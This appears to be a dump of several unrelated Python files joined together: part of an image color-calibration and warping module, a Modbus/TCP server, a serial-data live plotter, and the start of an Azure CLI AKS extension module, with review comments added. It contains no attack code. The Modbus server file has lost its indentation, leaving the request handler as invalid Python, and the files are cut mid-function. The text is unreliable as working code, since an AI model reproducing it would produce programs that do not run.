        print('COLOR: CONFLICT! matches multiple colors (',possible_colors,')\t\t',pixel_color,' (rgb)\t',hsv,'(hsv)')
        return None
def rgb2hsv(rgb):
    """
    Convert a single RGB pixel to HSV.

    scikit-image's color.rgb2hsv only accepts image arrays, so the pixel is
    wrapped in a 1x1 image and the lone result pixel is unwrapped again.
    """
    one_pixel_img = numpy.zeros((1, 1, 3))
    one_pixel_img[0, 0] = rgb
    return color.rgb2hsv(one_pixel_img)[0][0]
def count_circles_of_2d_array(array):
    """
    Returns: Total number of circles in array (sum of all row lengths).
    """
    return sum(len(row) for row in array)
def count_circles_of_dictionary_with_arrays(dictionary):
    """
    Returns: Total number of circles across all dictionary values.
    """
    return sum(len(entries) for entries in dictionary.values())
def rgb2gray(rgb_img):
    """
    Convert an RGB image array to grayscale using the classic ITU-R 601
    luma weights (0.2989 R + 0.5870 G + 0.1140 B).
    """
    # Copy first so the caller's image is never modified.
    rgb_copy = numpy.array(rgb_img, copy=True)
    return numpy.dot(rgb_copy[..., :3], [0.2989, 0.5870, 0.1140])
def save_image(name, image, img_type='jpg'):
    """
    Saves image within a thread for better performance.
    """
    # NOTE(review): scipy.misc.imsave was removed in SciPy >= 1.2, so this
    # only works with an old SciPy (+ Pillow) install. Consider
    # imageio.imwrite or skimage.io.imsave; confirm the pinned SciPy version.
    def save():
        # Images always land in ./doc/ under the given base name.
        path = './doc/'+name+'.'+img_type
        scipy.misc.imsave(path, image)
    # Fire-and-forget: the thread is never joined, so the caller does not
    # wait for (or learn about failures of) the write.
    threading.Thread(target=save).start()
#########################################################################################################
#########################################################################################################
def calibrate_colors(rgb_img, radius_range, searched_range, counter=0):
    """
    This method defines a color range as hsv color touple depending on
    detected circles inside a rgb image.  The algorithm finds circles
    inside the rgb image.  Every circle whose center coordinate fits a
    pixel range in searched_range is stored.  For each collection the
    minimum and maximum hsv channel values (widened by a tolerance)
    are returned.

    parameters: rgb_img        -- RGB image array
                radius_range   -- (min_radius, max_radius) in pixels
                searched_range -- {key: ((x_min, y_min), (x_max, y_max))}
                counter        -- suffix for the saved debug images
    Returns: {key: (hsv_min_tuple, hsv_max_tuple)}, or None when at least
             one key collected no circle.
    """
    min_radius, max_radius = radius_range
    # convert image to gray
    gray_img = rgb2gray(rgb_img)
    # find edges in image
    edges_img = canny(gray_img, sigma=15.0, low_threshold=0.55, high_threshold=0.8)
    save_image('calibrate_edges_'+str(counter), edges_img)
    # find circles from edge_image
    hough_radii, hough_res = find_circles(edges_img, min_radius, max_radius)
    centers, accums, radii = circles_per_radius(hough_radii, hough_res, number_circles_per_radius=16)
    def in_range(coords, key):
        # coords is (y, x); searched_range stores (x, y) corner pairs.
        in_picture = 0 <= coords[0] <= len(rgb_img) and 0 <= coords[1] <= len(rgb_img[0])
        x_okay = searched_range[key][0][0] <= coords[1] <= searched_range[key][1][0]
        y_okay = searched_range[key][0][1] <= coords[0] <= searched_range[key][1][1]
        return in_picture and x_okay and y_okay
    debug_img = numpy.zeros((len(rgb_img), len(rgb_img[0]), 3), dtype=numpy.uint8)
    # initialize
    # NOTE(review): hsv_color_ranges is initialized but never filled or
    # used below -- looks like dead code; confirm before removing.
    correct_colors= {}
    hsv_color_ranges = {}
    for key, coord_range in searched_range.items():
        correct_colors[key] = []
        hsv_color_ranges[key] = None
    for idx in numpy.argsort(accums)[::-1][:]:  # sort by quality (best first)
        center_y, center_x = centers[idx]
        add_circle_outlines_to_image(debug_img, center_y, center_x, radii[idx], rgb_img[center_y, center_x])
        # get all circle centers to the correct array
        for key, coord_range in searched_range.items():
            if in_range(centers[idx], key):
                # get rgb color of center
                rgb_color = rgb_img[center_y, center_x]
                hsv_color = rgb2hsv(rgb_color)
                correct_colors[key].append(hsv_color)
    for key, coord_range in searched_range.items():
        #add_circle_outlines_to_image(debug_img, coord_range[0][1], coord_range[0][0], 5, [255,250,0])
        #add_circle_outlines_to_image(debug_img, coord_range[1][1], coord_range[1][0], 5, [255,250,0])
        add_rect_outlines_to_image(debug_img, coord_range[0], coord_range[1], [255,250,0])
    save_image('calibrate_circles_'+str(counter), debug_img)
    for key, color_array in correct_colors.items():
        if len(color_array) == 0:
            print('at least one color not detected')
            return None
    # Compute the per-channel min/max envelope of the collected HSV samples.
    for key, color_array in correct_colors.items():
        h_min = None
        s_min = None
        v_min = None
        h_max = None
        s_max = None
        v_max = None
        for i in range(len(color_array)):
            hsv = color_array[i]
            h_min = hsv[0] if h_min is None or h_min > hsv[0] else h_min
            s_min = hsv[1] if s_min is None or s_min > hsv[1] else s_min
            v_min = hsv[2] if v_min is None or v_min > hsv[2] else v_min
            h_max = hsv[0] if h_max is None or h_max < hsv[0] else h_max
            s_max = hsv[1] if s_max is None or s_max < hsv[1] else s_max
            v_max = hsv[2] if v_max is None or v_max < hsv[2] else v_max
        color_tolerance = 0.02 # 2%
        # NOTE(review): the v channel is widened by tolerance*256 although
        # skimage's HSV values are in [0, 1] -- this looks like a leftover
        # from a 0..255 value scale; confirm the intended scale.
        correct_colors[key] = ((h_min-color_tolerance, s_min-color_tolerance , v_min-(color_tolerance*256)),(h_max+color_tolerance, s_max+color_tolerance, v_max+(color_tolerance*256)))
    return correct_colors
#########################################################################################################
#########################################################################################################
def warp_david(img, edges):
    """
    Warpes an image by keeping its size, transforming the pixel data to
    be distorted between the four corners.
    David style => slow ...

    parameters: img   -- RGB image indexed img[y, x]
                edges -- dict with 'upper_left', 'upper_right',
                         'lower_left', 'lower_right' corner coords (x, y)
    Returns: warped image of shape (width, height, 3); pixels are written
             as warped[x, y], i.e. axes transposed relative to img.
    """
    width = len(img[1])
    height = len(img)
    # BUGFIX: numpy.empty returned uninitialized memory for every pixel the
    # loop below never hits, producing nondeterministic garbage in the
    # output; zeros gives a deterministic black background instead.
    warped = numpy.zeros((width, height, 3), dtype=numpy.uint8)
    for x in range(width):
        x_share = x / width
        x_share_comp = 1 - x_share
        # y extent of the target quad at this column
        y_start = edges['upper_left'][1] * x_share_comp + edges['upper_right'][1] * x_share
        y_end = edges['lower_left'][1] * x_share_comp + edges['lower_right'][1] * x_share
        for y in range(height):
            y_share = y / height
            y_share_comp = 1 - y_share
            # x extent of the target quad at this row
            x_start = edges['upper_left'][0] * y_share_comp + edges['lower_left'][0] * y_share
            x_end = edges['upper_right'][0] * y_share_comp + edges['lower_right'][0] * y_share
            x_len = x_end - x_start
            y_len = y_end - y_start
            # bilinear interpolation of the target position
            x_new = x_start + x_share * x_len
            y_new = y_start + y_share * y_len
            warped[int(x_new), int(y_new)] = (img[y, x][0], img[y, x][1], img[y, x][2])
    return warped
def warp(img, corners):
    """
    Projectively warp img so the quadrilateral given by corners is mapped
    onto the full image rectangle; the output keeps the input size.
    """
    height = len(img)
    width = len(img[0])
    quad = numpy.array((
        corners['upper_left'],
        corners['lower_left'],
        corners['lower_right'],
        corners['upper_right']
    ))
    rect = numpy.array((
        (0, 0),
        (0, height),
        (width, height),
        (width, 0)
    ))
    projection = transform.ProjectiveTransform()
    # Estimate the homography that maps quad onto rect.
    projection.estimate(quad, rect)
    return transform.warp(img, projection, output_shape=(height, width))
def scale_to_fit(img, size):
    """
    Scales an image to a given size by warping with no regard to the ratio.
    Returns: warped image as ndarray of shape (size[1], size[0], ...).
    """
    height = len(img)
    width = len(img[0])
    target_rect = numpy.array((
        (0, 0),
        (0, size[1]),
        (size[0], size[1]),
        (size[0], 0)
    ))
    source_rect = numpy.array((
        (0, 0),
        (0, height),
        (width, height),
        (width, 0)
    ))
    projection = transform.ProjectiveTransform()
    # Map the target rectangle onto the source rectangle.
    projection.estimate(target_rect, source_rect)
    return transform.warp(img, projection, output_shape=(size[1], size[0]))
#########################################################################################################
#########################################################################################################
# This module is a library; the real entry point lives in start.py.
if __name__ == '__main__':
    print('Start the program with \'python3 start.py\', you are wrong here.')
|
server.py | # -*- coding: utf-8 -*-
# Python module: ModbusServer class (ModBus/TCP Server)
from . import constants as const
from .utils import test_bit, set_bit
import socket
import struct
from threading import Lock, Thread
# for python2 compatibility
try:
from socketserver import BaseRequestHandler, ThreadingTCPServer
except ImportError:
from SocketServer import BaseRequestHandler, ThreadingTCPServer
class DataBank:
    """ Data class for thread safe access to bits and words space """

    # 65536 coils / discrete inputs, guarded by bits_lock.
    bits_lock = Lock()
    bits = [False] * 0x10000
    # 65536 16-bit registers, guarded by words_lock.
    words_lock = Lock()
    words = [0] * 0x10000

    @classmethod
    def get_bits(cls, address, number=1):
        """Return `number` bits starting at `address`, or None when the
        requested span falls outside the bit space."""
        with cls.bits_lock:
            if address < 0 or address + number > len(cls.bits):
                return None
            return cls.bits[address: address + number]

    @classmethod
    def set_bits(cls, address, bit_list):
        """Write bit_list starting at `address`; True on success, None when
        the span falls outside the bit space."""
        with cls.bits_lock:
            if address < 0 or address + len(bit_list) > len(cls.bits):
                return None
            cls.bits[address: address + len(bit_list)] = bit_list
            return True

    @classmethod
    def get_words(cls, address, number=1):
        """Return `number` words starting at `address`, or None when the
        requested span falls outside the word space."""
        with cls.words_lock:
            if address < 0 or address + number > len(cls.words):
                return None
            return cls.words[address: address + number]

    @classmethod
    def set_words(cls, address, word_list):
        """Write word_list starting at `address`; True on success, None when
        the span falls outside the word space."""
        with cls.words_lock:
            if address < 0 or address + len(word_list) > len(cls.words):
                return None
            cls.words[address: address + len(word_list)] = word_list
            return True
class ModbusServer(object):
"""Modbus TCP server"""
class ModbusService(BaseRequestHandler):
def handle(self):
while True:
rx_head = self.request.recv(7)
# close connection if no standard 7 bytes header
if not (rx_head and len(rx_head) == 7):
break
# decode header
(rx_hd_tr_id, rx_hd_pr_id,
rx_hd_length, rx_hd_unit_id) = struct.unpack('>HHHB', rx_head)
# close connection if frame header content inconsistency
if not ((rx_hd_pr_id == 0) and (2 < rx_hd_length < 256)):
break
# receive body
rx_body = self.request.recv(rx_hd_length - 1)
# close connection if lack of bytes in frame body
if not (rx_body and (len(rx_body) == rx_hd_length - 1)):
break
# body decode: function code
rx_bd_fc = struct.unpack('B', rx_body[0:1])[0]
# close connection if function code is inconsistent
if rx_bd_fc > 0x7F:
break
# default except status
exp_status = const.EXP_NONE
# functions Read Coils (0x01) or Read Discrete Inputs (0x02)
if rx_bd_fc in (const.READ_COILS, const.READ_DISCRETE_INPUTS):
(b_address, b_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested bits
if 0x0001 <= b_count <= 0x07D0:
bits_l = DataBank.get_bits(b_address, b_count)
if bits_l:
# allocate bytes list
b_size = int(b_count / 8)
b_size += 1 if (b_count % 8) else 0
bytes_l = [0] * b_size
# populate bytes list with data bank bits
for i, item in enumerate(bits_l):
if item:
byte_i = int(i/8)
bytes_l[byte_i] = set_bit(bytes_l[byte_i], i % 8)
# format body of frame with bits
tx_body = struct.pack('BB', rx_bd_fc, len(bytes_l))
# add bytes with bits
for byte in bytes_l:
tx_body += struct.pack('B', byte)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# functions Read Holding Registers (0x03) or Read Input Registers (0x04)
elif rx_bd_fc in (const.READ_HOLDING_REGISTERS, const.READ_INPUT_REGISTERS):
(w_address, w_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested words
if 0x0001 <= w_count <= 0x007D:
words_l = DataBank.get_words(w_address, w_count)
if words_l:
# format body of frame with words
tx_body = struct.pack('BB', rx_bd_fc, w_count * 2)
for word in words_l:
tx_body += struct.pack('>H', word)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Single Coil (0x05)
elif rx_bd_fc is const.WRITE_SINGLE_COIL:
(b_address, b_value) = struct.unpack('>HH', rx_body[1:])
f_b_value = bool(b_value == 0xFF00)
if DataBank.set_bits(b_address, [f_b_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Single Register (0x06)
elif rx_bd_fc is const.WRITE_SINGLE_REGISTER:
(w_address, w_value) = struct.unpack('>HH', rx_body[1:])
if DataBank.set_words(w_address, [w_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Multiple Coils (0x0F)
elif rx_bd_fc is const.WRITE_MULTIPLE_COILS:
(b_address, b_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated coils
if (0x0001 <= b_count <= 0x07B0) and (byte_count >= (b_count/8)):
# allocate bits list
bits_l = [False] * b_count
# populate bits list with bits from rx frame
for i, item in enumerate(bits_l):
b_bit_pos = int(i/8)+6
b_bit_val = struct.unpack('B', rx_body[b_bit_pos:b_bit_pos+1])[0]
bits_l[i] = test_bit(b_bit_val, i % 8)
# write words to data bank
if DataBank.set_bits(b_address, bits_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Multiple Registers (0x10)
elif rx_bd_fc is const.WRITE_MULTIPLE_REGISTERS:
(w_address, w_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated words
if (0x0001 <= w_count <= 0x007B) and (byte_count == w_count * 2):
# allocate words list
words_l = [0] * w_count
# populate words list with words from rx frame
for i, item in enumerate(words_l):
w_offset = i * 2 + 6
words_l[i] = struct.unpack('>H', rx_body[w_offset:w_offset + 2])[0]
# write words to data bank
if DataBank.set_words(w_address, words_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
else:
exp_status = const.EXP_ILLEGAL_FUNCTION
# check exception
if exp_status != const.EXP_NONE:
# format body of frame with exception status
tx_body = struct.pack('BB', rx_bd_fc + 0x80, exp_status)
# build frame header
tx_head = struct.pack('>HHHB', rx_hd_tr_id, rx_hd_pr_id, len(tx_body) + 1, rx_hd_unit_id)
# send frame
self.request.send(tx_head + tx_body)
self.request.close()
def __init__(self, host='localhost', port=502, no_block=False, ipv6=False):
    """Constructor

    Modbus server constructor.

    :param host: hostname or IPv4/IPv6 address server address (optional)
    :type host: str
    :param port: TCP port number (optional)
    :type port: int
    :param no_block: set no block mode, in this mode start() return (optional)
    :type no_block: bool
    :param ipv6: use ipv6 stack
    :type ipv6: bool
    """
    self.host = host
    self.port = port
    self.no_block = no_block
    self.ipv6 = ipv6
    # set class attribute
    # NOTE: these assignments mutate ThreadingTCPServer class-wide (every
    # instance in this process); address_family must be set BEFORE the
    # server object is constructed below, since the socket is created there.
    ThreadingTCPServer.address_family = socket.AF_INET6 if self.ipv6 else socket.AF_INET
    ThreadingTCPServer.daemon_threads = True
    # init server
    # bind_and_activate=False: the socket is bound/activated later in start(),
    # so constructing the server does not yet claim the port.
    self._service = ThreadingTCPServer((self.host, self.port), self.ModbusService, bind_and_activate=False)
    # set socket options
    self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    # TODO test no_delay with bench
    self._service.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    # add thread for no block mode
    # Daemon thread: it will not keep the interpreter alive on exit.
    if self.no_block:
        self._serve_th = Thread(target=self._service.serve_forever)
        self._serve_th.daemon = True
def start(self):
    """Bind and activate the server socket, then serve requests.

    In blocking mode (no_block=False) this call never returns while the
    server runs; in no-block mode requests are served by the daemon thread
    created in the constructor and this call returns immediately.
    """
    # Deferred bind/activate (the constructor used bind_and_activate=False).
    self._service.server_bind()
    self._service.server_activate()
    if not self.no_block:
        # Blocking mode: serve on the calling thread.
        self._service.serve_forever()
        return
    # Non-blocking mode: hand the accept loop to the background thread.
    self._serve_th.start()
|
plot_serial.py | #python 3.6.5
#matplotlib==3.0.3
#numpy==1.16.2
#pyserial==3.4
import time, threading
import numpy as np
from matplotlib.lines import Line2D
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import serial
import pylab
import struct
import string
import time
import queue
# --- plot / serial configuration ---------------------------------------
Baud = 115200          # serial baud rate
Port_name = "COM3"     # serial port name
Datanum = 2            # number of incoming data channels per line
yMax = 240             # initial y-axis upper limit
yMin = -240            # initial y-axis lower limit
x_span = 0.5           # x-axis span (only used by the commented-out scroll mode)
xMax = 1               # initial x-axis upper limit
xMin = 0               # initial x-axis lower limit
#xMin = xMax - x_span  #
x_name = "Time"        # x-axis label
y_name = "multi_val"   # y-axis label
Title = "pic"          # figure title
line_name = ["X", "Y"]  # legend entry per channel
# Line color per channel. Fixed typo: 'megenta' -> 'magenta'
# (matplotlib raises ValueError for unknown color names once Datanum > 5).
Color = ['red', 'orange', 'darkblue', 'darkslategray', 'deeppink', 'magenta']
class Scope(object):
    """Live multi-channel oscilloscope view over a matplotlib Axes.

    Holds one Line2D per data channel (Datanum channels) and grows the
    x/y axis limits on demand as new samples arrive. Reads/updates the
    module-level globals yMin/yMax/xMin/xMax.
    """

    def __init__(self, ax, maxt=2, dt=0.002):
        # ax: the Axes to draw into; dt: time step added per sample;
        # maxt: window length (only used by the commented-out scroll logic).
        self.ax = ax
        self.dt = dt
        self.maxt = maxt
        self.tdata = [0]
        self.ydata = []
        self.line=[]
        for i in range(0,Datanum):
            self.ydata.append([0])  # one sub-list of samples per channel
        for i in range(0,Datanum):
            self.ax.plot(self.tdata, self.ydata[i])
        for i in range(0,Datanum):
            self.line.append(Line2D(self.tdata, self.ydata[i],color = Color[i]))
            self.ax.add_line(self.line[i])
        self.ax.set_ylim(yMin, yMax)  # initialize y-axis limits
        self.ax.set_xlim(0,xMax)      # initialize x-axis limits

    def update(self, data):
        """FuncAnimation callback: append one sample and rescale axes.

        data is [flag, sample]: flag 0 means "no new sample, skip";
        flag 1 means sample is a list of Datanum floats.
        Returns the Line2D artists (required for blitting).
        """
        global yMax
        global yMin
        global xMax
        global xMin
        global x_span
        # Original scrolling-window logic, intentionally disabled:
        #lastt = self.tdata[-1]
        #if lastt > self.tdata[0] + self.maxt:  # reset the arrays
        #self.tdata = [self.tdata[-1]]
        #self.ydata = [self.ydata[-1]]
        #self.ax.set_xlim(self.tdata[0], self.tdata[0] + self.maxt)
        #self.ax.figure.canvas.draw()
        if data[0] == 0:
            return self.line;
        y = data[1]
        t = self.tdata[-1] + self.dt
        self.tdata.append(t)  # append new time point
        for i in range(0,Datanum):
            self.ydata[i].append(y[i])  # append new sample for channel i
            self.line[i].set_data(self.tdata, self.ydata[i])
            if (y[i]) > yMax:
                # sample exceeds the top: grow the y-axis and force a redraw
                yMax = y[i] + 1
                self.ax.set_ylim(yMin, yMax)
                self.ax.figure.canvas.draw()
            elif (y[i]) < yMin:
                yMin = y[i] - 1
                self.ax.set_ylim(yMin, yMax)
                self.ax.figure.canvas.draw()
        if t > xMax:
            # ran off the right edge: extend the x-axis
            xMax = t + 0.5
            #xMin = xMax - x_span
            self.ax.set_xlim(xMin, xMax)
            self.ax.figure.canvas.draw()
        return self.line
def emitter(p=0.03):
    """Frame generator for FuncAnimation.

    Yields [0, 0] when no serial sample is queued (Scope.update treats the
    leading 0 as "skip frame") and [1, sample] otherwise.

    Fixed: the original yielded exactly once and then raised StopIteration,
    which froze the animation after its first interval; FuncAnimation expects
    the frame generator to keep yielding.

    :param p: unused, kept for interface compatibility
    """
    while True:
        if DataList.qsize() == 0:
            yield [0, 0]
        else:
            yield [1, DataList.get()]
def SerialDataRead():
    """Reader-thread body: forever read one line from the serial port,
    parse it as whitespace-separated floats and queue the sample.

    Malformed lines are reported and skipped. The original fell through
    after the failed parse and re-queued the previous sample (or raised
    NameError if the very first line was malformed, since `data` was
    never assigned).
    """
    while True:
        SerData = ser.read_until()        # read one terminator-ended chunk (bytes)
        SerData = str(SerData)            # e.g. "b'1.0 2.0\\r\\n'"
        SerData = SerData[2:-3].split()   # strip the b'...' repr and trailing \r\n
        try:
            data = list(map(float, SerData))
        except ValueError:
            print("Wrong Format")
            continue                      # skip the bad line instead of queueing stale data
        DataList.put(data)
def SerialPlot():
    # Debug helper thread body. The loop condition is literally 0, so this
    # is intentionally dead code and the function returns immediately.
    # Flip `while 0` to `while 1` to dump queued samples to stdout — but note
    # that doing so CONSUMES samples the animation's emitter() also needs.
    while 0:
        while DataList.qsize() != 0:
            a = DataList.get()
            print(type(a))
            print(a)
# Figure size 7x7 inches (i.e. 700x700 px at the default 100 dpi).
fig, ax = plt.subplots(figsize = (7, 7))
scope = Scope(ax)
# Drive Scope.update from the emitter generator every 10 ms; blit for speed.
ani = animation.FuncAnimation(fig, scope.update, emitter, interval=10, blit=True)
#ax.xlabel(x_name)
#ax.ylabel(y_name)
#ax.title (Title)
#ax.legend(line_name)
# NOTE(review): plt.show() runs at import time, BEFORE the __main__ block
# below, so `ser`/`DataList` do not exist yet when the animation first calls
# emitter(), and the threads only start once the window is closed — confirm
# whether this ordering is intended.
plt.show()
if __name__ == "__main__":
    # Open the serial port with the configured name and baud rate.
    ser = serial.Serial(Port_name, Baud)
    # Thread-safe hand-off between the reader thread and the plot.
    DataList = queue.Queue()
    ReadData = threading.Thread(target=SerialDataRead, name='ReadData')
    Plot = threading.Thread(target=SerialPlot, name='Plot')
    ReadData.start()
    Plot.start()
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2022_01_02_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
    """Return the full path of *binary* found on the PATH, or None.

    On Windows an '.exe' suffix is appended before searching. Uses
    os.pathsep instead of the original hard-coded ';' / ':' split, and
    tolerates an unset PATH.
    """
    path_var = os.getenv('PATH')
    if not path_var:
        # No PATH at all -> nothing can be found.
        return None
    if platform.system() == 'Windows':
        binary = binary + '.exe'
    for part in path_var.split(os.pathsep):
        bin_path = os.path.join(part, binary)
        # Candidate must exist, be a regular file, and be executable by us.
        if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
            return bin_path
    return None
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
    """
    # Probe the URL up to 9 times, one second apart, and open the browser as
    # soon as it answers (or after the retries are exhausted). The original
    # `break` sat at loop level, exiting unconditionally after the first probe
    # and defeating the retry loop entirely.
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break  # URL is reachable: stop probing.
        except URLError:
            time.sleep(1)
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # args must be an argument tuple; the original passed a SET literal
    # ({url}), which only worked by accident of Thread iterating it.
    t = threading.Thread(target=wait_then_open, args=(url,))
    t.daemon = True
    t.start()
def _ssl_context():
    """Pick an SSL context for probing URLs.

    Returns the default verified context on modern Python; on Python < 3.4,
    or inside Cloud Shell on Windows, falls back to a bare (unverified)
    SSLContext.
    """
    legacy = sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows')
    if not legacy:
        return ssl.create_default_context()
    try:
        # PROTOCOL_TLS was added in python 2.7.13 and 3.6
        return ssl.SSLContext(ssl.PROTOCOL_TLS)
    except AttributeError:
        return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and its service principal, retrying SP
    creation around AAD propagation delays.

    :return: the appId of the created application, or False if all ten
             service-principal creation attempts failed.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # Fixed: the keyword was misspelled 'messsage' in the original call.
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    for x in range(0, 10):
        hook.add(message='Creating service principal',
                 value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(
                cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            # Linear backoff: 2s, 4s, 6s, ...
            time.sleep(2 + 2 * x)
    else:
        # Loop exhausted without a successful creation.
        return False
    hook.add(message='Finished service principal creation',
             value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete role assignments for *service_principal*, retrying around AAD
    propagation delays.

    Retries up to 10 times with linearly growing sleeps. Returns True on
    success, False if every attempt failed with a CloudError; CLIError is
    re-raised immediately.

    NOTE(review): an identical function is re-defined later in this module;
    that later definition shadows this one at import time.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete',
                 value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError as ex:
            # User-facing errors are not retried.
            raise ex
        except CloudError as ex:
            # Transient service error: log and back off (delay, 2*delay, ...).
            logger.info(ex)
            time.sleep(delay + delay * x)
    else:
        # Loop exhausted without a break: every attempt failed.
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
